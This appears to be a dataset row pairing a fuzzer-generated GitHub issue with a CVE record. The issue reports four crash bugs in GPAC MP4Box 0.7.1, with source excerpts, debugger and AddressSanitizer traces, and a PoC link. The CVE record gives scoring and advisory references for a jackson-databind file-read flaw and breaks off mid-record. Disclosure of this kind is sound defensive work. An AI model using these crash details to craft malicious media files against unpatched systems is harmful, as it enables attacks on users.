- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# MP4Box
## version
MP4Box 0.7.1
## description
```txt
GPAC version 0.7.1-rev0-g440d475-HEAD
```
## download link
## others
please send email to [email protected] if you have any questions.
---------------------
## [email protected]:2058-65___null-pointer-dereference
### description
An issue was discovered in MP4Box 0.7.1, There is a/an null-pointer-dereference in function DumpTrackInfo at filedump.c:2058-65
### commandline
MP4Box -info @@
### source
```c
2054 esd = gf_isom_get_esd(file, trackNum, 1);
2055 if (!esd) {
2056 fprintf(stderr, "WARNING: Broken MPEG-4 Track\n");
2057 } else {
>2058 const char *st = gf_odf_stream_type_name(esd->decoderConfig->streamType);
2059 if (st) {
2060 fprintf(stderr, "MPEG-4 Config%s%s Stream - ObjectTypeIndication 0x%02x\n",
2061 full_dump ? "\n\t" : ": ", st, esd->decoderConfig->objectTypeIndication);
2062 } else {
2063 fprintf(stderr, "MPEG-4 Config%sStream Type 0x%02x - ObjectTypeIndication 0x%02x\n",
```
### my dbg
```c
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000428432 in DumpTrackInfo (file=0x655010, trackID=0x2, full_dump=GF_FALSE) at filedump.c:2058
2058 const char *st = gf_odf_stream_type_name(esd->decoderConfig->streamType);
gdb-peda$ p esd
$1 = (GF_ESD *) 0x659bb0
gdb-peda$ p esd->decoderConfig
$2 = (GF_DecoderConfig *) 0x0
```
### bug report
```txt
[33m[iso file] more than one stts entry at the end of the track with sample_delta=0 - forbidden ! Fixing to 1
[0m[31m[ODF] Error reading descriptor (tag 4 size 47): Invalid MPEG-4 Descriptor
[0m[33m[iso file] Unknown box type ....
[0m[31m[iso file] Read Box type .... (0x01000000) has size 0 but is not at root/file level, skipping
[0m[33m[iso file] Unknown box type ...
[0m[33m[iso file] Unknown box type ...<
[0m[33m[iso file] Unknown box type ...<
[0m[33m[iso file] Unknown box type ...<
[0m[33m[iso file] Unknown box type <JC.
[0m[31m[iso file] Incomplete box UNKN
[0m[31m[iso file] Incomplete file while reading for dump - aborting parsing
[0m* Movie Info *
Timescale 600 - 2 tracks
Computed Duration 00:00:04.966 - Indicated Duration 00:00:04.966
Fragmented File: no
File suitable for progressive download (moov before mdat)
File Brand mp42 - version 1
Compatible brands: mp42 mp41
Created: GMT Fri Oct 28 17:46:46 2005
Modified: GMT Fri Oct 28 17:46:46 2005
File has no MPEG4 IOD/OD
Track # 1 Info - TrackID 1 - TimeScale 32000
Media Duration 00:00:00.004 - Indicated Duration 00:00:04.992
Track has 1 edit lists: track duration is 00:00:04.966
Media Info: Language "English (eng)" - Type "soun:mp4a" - 156 samples
MPEG-4 Config: Audio Stream - ObjectTypeIndication 0x40
MPEG-4 Audio AAC LC - 2 Channel(s) - SampleRate 32000
Self-synchronized
RFC6381 Codec Parameters: mp4a.40.2
All samples are sync
Track # 2 Info - TrackID 2 - TimeScale 30
Media Duration 00:00:00.000 - Indicated Duration 00:00:04.966
Track has 1 edit lists: track duration is 00:00:04.966
Media Info: Language "English (eng)" - Type "vide:mp4v" - 0 samples
Visual Track layout: x=0 y=0 width=190 height=240
AddressSanitizer:DEADLYSIGNAL
=================================================================
==4953==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x0000005794e8 bp 0x7ffde6e30af0 sp 0x7ffde6e0aba0 T0)
==4953==The signal is caused by a READ memory access.
==4953==Hint: address points to the zero page.
#0 0x5794e7 in DumpTrackInfo /src/gpac/applications/mp4box/filedump.c:2058:65
#1 0x587ca2 in DumpMovieInfo /src/gpac/applications/mp4box/filedump.c:2950:3
#2 0x54d944 in mp4boxMain /src/gpac/applications/mp4box/main.c:4305:9
#3 0x7f7c7de2f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#4 0x4244e8 in _start (/src/gpac/installed-asan/bin/MP4Box+0x4244e8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /src/gpac/applications/mp4box/filedump.c:2058:65 in DumpTrackInfo
==4953==ABORTING
```
### others
from fuzz project None
crash name None-00000322-1558597650.mp4
Auto-generated by pyspider at 2019-05-23 16:16:43
please send email to [email protected] if you have any questions.
## gf_isom_get_original_format_type@drm_sample.c:540-33___null-pointer-dereference
### description
An issue was discovered in MP4Box 0.7.1, There is a/an null-pointer-dereference in function gf_isom_get_original_format_type at drm_sample.c:540-33
### commandline
MP4Box -info @@
### source
```c
536 Media_GetSampleDesc(trak->Media, sampleDescriptionIndex, &sea, NULL);
537 if (!sea) return GF_BAD_PARAM;
538
539 sinf = (GF_ProtectionSchemeInfoBox*)gf_list_get(sea->protections, 0);
> 540 if (outOriginalFormat && sinf->or \*bug=>*\ iginal_format) {
541 *outOriginalFormat = sinf->original_format->data_format;
542 }
543 return GF_OK;
544 }
545
```
### my debug
```c
Stopped reason: SIGSEGV
0x00007ffff7865711 in gf_isom_get_original_format_type (the_file=0x655010, trackNumber=0x2, sampleDescriptionIndex=0x1, outOriginalFormat=0x7ffffffcbf94)
at isomedia/drm_sample.c:540
540 if (outOriginalFormat && sinf->original_format) {
$1 = (GF_ProtectionSchemeInfoBox *) 0x0
```
### bug report
```txt
AddressSanitizer:DEADLYSIGNAL
=================================================================
==4969==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x7fd4b273ace9 bp 0x7ffc1d1f1070 sp 0x7ffc1d1f0fc0 T0)
==4969==The signal is caused by a READ memory access.
==4969==Hint: address points to the zero page.
#0 0x7fd4b273ace8 in gf_isom_get_original_format_type /src/gpac/src/isomedia/drm_sample.c:540:33
#1 0x7fd4b2961ecc in gf_media_get_rfc_6381_codec_name /src/gpac/src/media_tools/dash_segmenter.c:429:8
#2 0x580975 in DumpTrackInfo /src/gpac/applications/mp4box/filedump.c:2647:3
#3 0x587ca2 in DumpMovieInfo /src/gpac/applications/mp4box/filedump.c:2950:3
#4 0x54d944 in mp4boxMain /src/gpac/applications/mp4box/main.c:4305:9
#5 0x7fd4b112682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#6 0x4244e8 in _start (/src/gpac/installed-asan/bin/MP4Box+0x4244e8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /src/gpac/src/isomedia/drm_sample.c:540:33 in gf_isom_get_original_format_type
==4969==ABORTING
```
### others
from fuzz project None
crash name None-00000995-1558597651.mp4
Auto-generated by pyspider at 2019-05-23 16:16:43
please send email to [email protected] if you have any questions.
## [email protected]:271-28___null-pointer-dereference
### description
An issue was discovered in MP4Box 0.7.1, There is a/an null-pointer-dereference in function GetESD at track.c:271-28
### commandline
MP4Box -info @@
### source
```c
267 if (
268 #ifndef GPAC_DISABLE_ISOM_FRAGMENTS
269 moov->mvex &&
270 #endif
> 271 (esd->decoderConfig->streamType==GF_STREAM_VISUAL)) {
272 esd->slConfig->hasRandomAccessUnitsOnlyFlag = 0;
273 esd->slConfig->useRandomAccessPointFlag = 1;
274 if (trak->moov->mov->openMode!=GF_ISOM_OPEN_READ)
275 stbl->SyncSample = (GF_SyncSampleBox *) gf_isom_box_new(GF_ISOM_BOX_TYPE_STSS);
276 } else {
```
### mydebug
```c
Stopped reason: SIGSEGV
0x00007ffff78a6829 in GetESD (moov=0x656790, trackID=0x2, StreamDescIndex=0x1, outESD=0x7ffffffcbfe0) at isomedia/track.c:271
271 (esd->decoderConfig->streamType==GF_STREAM_VISUAL)) {
gdb-peda$ p esd->decoderConfig
$1 = (GF_DecoderConfig *) 0x0
```
### bug report
```txt
[33m[iso file] Unknown box type schh
[0m[33mICC colour profile not supported
[0m[33m[iso file] Unknown box type ....
[0m[31m[iso file] Incomplete box UNKN
[0m[31m[iso file] Incomplete file while reading for dump - aborting parsing
[0m* Movie Info *
Timescale 90000 - 2 tracks
Computed Duration 00:00:00.000 - Indicated Duration 00:00:00.000
Fragmented File: yes - duration 00:00:05.589
1 fragments - 1 SegmentIndexes
File suitable for progressive download (moov before mdat)
File Brand iso5 - version 1
Compatible brands: avc1 .so5 dash
Created: GMT Wed Mar 26 00:20:53 2014
Modified: GMT Wed Mar 26 00:20:54 2014
File has root IOD (9 bytes)
Scene PL 0xff - Graphics PL 0xff - OD PL 0xff
Visual PL: AVC/H264 Profile (0x7f)
Audio PL: High Quality Audio Profile @ Level 2 (0x0f)
No streams included in root OD
iTunes Info:
Encoder Software: HandBrake 0.9.9 2013052900
1 UDTA types: meta (1)
Track # 1 Info - TrackID 1 - TimeScale 90000
Media Duration 00:00:00.000 - Indicated Duration 00:00:00.000
Media Info: Language "Undetermined (und)" - Type "vide:encv" - 0 samples
Fragmented track: 15 samples - Media Duration 00:00:00.500
Visual Track layout: x=0 y=0 width=560 height=320
MPEG-4 Config: Visual Stream - ObjectTypeIndication 0x21
AVC/H264 Video - Visual Size 560 x 320
AVC Info: 0 SPS - 0 PPS - Profile Baseline @ Level 3
NAL Unit length bits: 32
Chroma format YUV 4:2:0 - Luma bit depth 8 - chroma bit depth 8
Self-synchronized
*Encrypted stream - unknown scheme
[33m[ISOM Tools] Unkown protection scheme type
[0m RFC6381 Codec Parameters: avc1.42C01E
All samples are sync
Track # 2 Info - TrackID 2 - TimeScale 48000
Media Duration 00:00:00.000 - Indicated Duration 00:00:00.000
Media Info: Language "English (eng)" - Type "soun:enca" - 0 samples
Fragmented track: 24 samples - Media Duration 00:00:00.512
1 UDTA types: name (1)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==4998==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f500d1be119 bp 0x7ffeb6a2b510 sp 0x7ffeb6a2b2c0 T0)
==4998==The signal is caused by a READ memory access.
==4998==Hint: address points to the zero page.
#0 0x7f500d1be118 in GetESD /src/gpac/src/isomedia/track.c:271:28
#1 0x7f500d0e230a in gf_isom_get_esd /src/gpac/src/isomedia/isom_read.c:1086:6
#2 0x57946a in DumpTrackInfo /src/gpac/applications/mp4box/filedump.c:2054:9
#3 0x587ca2 in DumpMovieInfo /src/gpac/applications/mp4box/filedump.c:2950:3
#4 0x54d944 in mp4boxMain /src/gpac/applications/mp4box/main.c:4305:9
#5 0x7f500baaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#6 0x4244e8 in _start (/src/gpac/installed-asan/bin/MP4Box+0x4244e8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /src/gpac/src/isomedia/track.c:271:28 in GetESD
==4998==ABORTING
```
### others
from fuzz project None
crash name None-00001079-1558597651.mp4
Auto-generated by pyspider at 2019-05-23 16:16:45
please send email to [email protected] if you have any questions.
## ReadGF_IPMPX_RemoveToolNotificationListener@ipmpx_code.c:1103-54___heap-buffer-overflow
### description
An issue was discovered in MP4Box 0.7.1, There is a/an heap-buffer-overflow in function ReadGF_IPMPX_RemoveToolNotificationListener at ipmpx_code.c:1103-54
### commandline
MP4Box -info @@
### source
```c
1099 {
1100 u32 i;
1101 GF_IPMPX_RemoveToolNotificationListener*p = (GF_IPMPX_RemoveToolNotificationListener*)_p;
1102 p->eventTypeCount = gf_bs_read_int(bs, 8);
>1103 for (i=0; i<p->eventTypeCount; i++) p->eventType[i] = gf_bs_read_int(bs, 8);
1104 return GF_OK;
1105 }
1106 static u32 SizeGF_IPMPX_RemoveToolNotificationListener(GF_IPMPX_Data *_p)
1107 {
1108 GF_IPMPX_RemoveToolNotificationListener*p = (GF_IPMPX_RemoveToolNotificationListener*)_p;
```
### bug report
```txt
[33m[iso file] Unknown box type ....
[0m=================================================================
==5055==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000023c at pc 0x7fd7187bb791 bp 0x7ffc7c0c1d10 sp 0x7ffc7c0c1d08
WRITE of size 4 at 0x60400000023c thread T0
#0 0x7fd7187bb790 in ReadGF_IPMPX_RemoveToolNotificationListener /src/gpac/src/odf/ipmpx_code.c:1103:54
#1 0x7fd7187bb790 in GF_IPMPX_ReadData /src/gpac/src/odf/ipmpx_code.c:1981
#2 0x7fd7187b42a3 in gf_ipmpx_data_parse /src/gpac/src/odf/ipmpx_code.c:293:6
#3 0x7fd7187bae47 in ReadGF_IPMPX_MutualAuthentication /src/gpac/src/odf/ipmpx_code.c:440:7
#4 0x7fd7187bae47 in GF_IPMPX_ReadData /src/gpac/src/odf/ipmpx_code.c:1985
#5 0x7fd7187b42a3 in gf_ipmpx_data_parse /src/gpac/src/odf/ipmpx_code.c:293:6
#6 0x7fd718790176 in gf_odf_read_ipmp /src/gpac/src/odf/odf_code.c:2421:8
#7 0x7fd71876cf30 in gf_odf_read_descriptor /src/gpac/src/odf/desc_private.c:310:10
#8 0x7fd71876fe7f in gf_odf_parse_descriptor /src/gpac/src/odf/descriptors.c:161:8
#9 0x7fd71879bb29 in gf_odf_desc_read /src/gpac/src/odf/odf_codec.c:302:6
#10 0x7fd71856a82a in esds_Read /src/gpac/src/isomedia/box_code_base.c:1259:7
#11 0x7fd71861bc3c in gf_isom_box_read /src/gpac/src/isomedia/box_funcs.c:1323:9
#12 0x7fd71861bc3c in gf_isom_box_parse_ex /src/gpac/src/isomedia/box_funcs.c:196
#13 0x7fd71857f524 in audio_sample_entry_Read /src/gpac/src/isomedia/box_code_base.c:3952:8
#14 0x7fd71861bc3c in gf_isom_box_read /src/gpac/src/isomedia/box_funcs.c:1323:9
#15 0x7fd71861bc3c in gf_isom_box_parse_ex /src/gpac/src/isomedia/box_funcs.c:196
#16 0x7fd71861dcdf in gf_isom_box_array_read_ex /src/gpac/src/isomedia/box_funcs.c:1217:7
#17 0x7fd71858fdd3 in stsd_Read /src/gpac/src/isomedia/box_code_base.c:5604:9
#18 0x7fd71861bc3c in gf_isom_box_read /src/gpac/src/isomedia/box_funcs.c:1323:9
#19 0x7fd71861bc3c in gf_isom_box_parse_ex /src/gpac/src/isomedia/box_funcs.c:196
#20 0x7fd71861ab97 in gf_isom_parse_root_box /src/gpac/src/isomedia/box_funcs.c:42:8
#21 0x7fd71864182a in gf_isom_parse_movie_boxes /src/gpac/src/isomedia/isom_intern.c:204:7
#22 0x7fd718645e05 in gf_isom_open_file /src/gpac/src/isomedia/isom_intern.c:604:19
#23 0x7fd71864e478 in gf_isom_open /src/gpac/src/isomedia/isom_read.c:412:11
#24 0x54acf5 in mp4boxMain /src/gpac/applications/mp4box/main.c:4106:11
#25 0x7fd71701c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#26 0x4244e8 in _start (/src/gpac/installed-asan/bin/MP4Box+0x4244e8)
0x60400000023c is located 0 bytes to the right of 44-byte region [0x604000000210,0x60400000023c)
allocated by thread T0 here:
#0 0x4e8718 in malloc /work/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88
#1 0x7fd7187b4c06 in NewGF_IPMPX_RemoveToolNotificationListener /src/gpac/src/odf/ipmpx_code.c:1091:2
#2 0x7fd7187b4c06 in gf_ipmpx_data_new /src/gpac/src/odf/ipmpx_code.c:1714
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/gpac/src/odf/ipmpx_code.c:1103:54 in ReadGF_IPMPX_RemoveToolNotificationListener
Shadow bytes around the buggy address:
0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff8000: fa fa 00 00 00 00 00 05 fa fa fd fd fd fd fd fd
0x0c087fff8010: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
0x0c087fff8020: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fd
0x0c087fff8030: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
=>0x0c087fff8040: fa fa 00 00 00 00 00[04]fa fa fa fa fa fa fa fa
0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5055==ABORTING
```
### others
from fuzz project None
crash name None-00001119-1558597651.mp4
Auto-generated by pyspider at 2019-05-23 16:16:46
please send email to [email protected] if you have any questions.
## other info
```txt
Linux 47851981ba92 3.19.0-79-generic #87~14.04.1-Ubuntu SMP Wed Dec 21 18:12:31 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
clang version 6.0.0 (tags/RELEASE_600/final)
Target: x86_64-unknown-linux-gnu
with Asan
```
[POC](https://github.com/TeamSeri0us/pocs/tree/master/gpac/MP4Box/vuln) | 4 bugs found in gpac v0.7.1 release | https://api.github.com/repos/gpac/gpac/issues/1249/comments | 2 | 2019-05-27T07:11:13Z | 2019-07-10T08:47:22Z | https://github.com/gpac/gpac/issues/1249 | 448,700,419 | 1,249 |
CVE-2019-12814 | 2019-06-19T14:15:10.897 | A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2858"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2935"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2936"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2937"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2938"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3044"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3045"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3046"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3050"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3149"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3200"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3292"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3297"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/2341"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/129da0204c876f746636018751a086cc581e0e07bcdeb3ee22ff5731%40%3Cdev.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/15a55e1d837fa686db493137cc0330c7ee1089ed9a9eea7ae7151ef1%40%3Cissues.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/1e04d9381c801b31ab28dec813c31c304b2a596b2a3707fa5462c5c0%40%3Cnotifications.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/28be28ffd6471d230943a255c36fe196a54ef5afc494a4781d16e37c%40%3Cissues.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/2ff264b6a94c5363a35c4c88fa93216f60ec54d1d973ed6b76a9f560%40%3Cissues.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592%40%3Ccommits.cassandra.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/4b832d1327703d6b287a6d223307f8f884d798821209a10647e93324%40%3Cnotifications.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/71f9ffd92410a889e27b95a219eaa843fd820f8550898633d85d4ea3%40%3Cissues.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/8fe2983f6d9fee0aa737e4bd24483f8f5cf9b938b9adad0c4e79b2a4%40%3Cnotifications.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef%40%3Cdev.struts.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/a3ae8a8c5e32c413cd27071d3a204166050bf79ce7f1299f6866338f%40%3Cissues.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/a62aa2706105d68f1c02023fe24aaa3c13b4d8a1826181fed07d9682%40%3Cnotifications.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/a78239b1f11cddfa86e4edee19064c40b6272214630bfef070c37957%40%3Cissues.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/b0a2b2cca072650dbd5882719976c3d353972c44f6736ddf0ba95209%40%3Cissues.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/b148fa2e9ef468c4de00de255dd728b74e2a97d935f8ced31eb41ba2%40%3Cnotifications.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/bf20574dbc2db255f1fd489942b5720f675e32a2c4f44eb6a36060cd%40%3Ccommits.accumulo.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/e0733058c0366b703e6757d8d2a7a04b943581f659e9c271f0841dfe%40%3Cnotifications.geode.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/eff7280055fc717ea8129cd28a9dd57b8446d00b36260c1caee10b87%40%3Cnotifications.zookeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190625-0006/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD",
"versionEndExcluding": "2.6.7.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "89660FC3-9198-414C-B89D-C61A4438BA3B",
"versionEndExcluding": "2.7.9.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5DB8A2D4-0FDE-4216-896B-52824106B97B",
"versionEndExcluding": "2.8.11.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.8.0",
"vulnerable": true
},
{
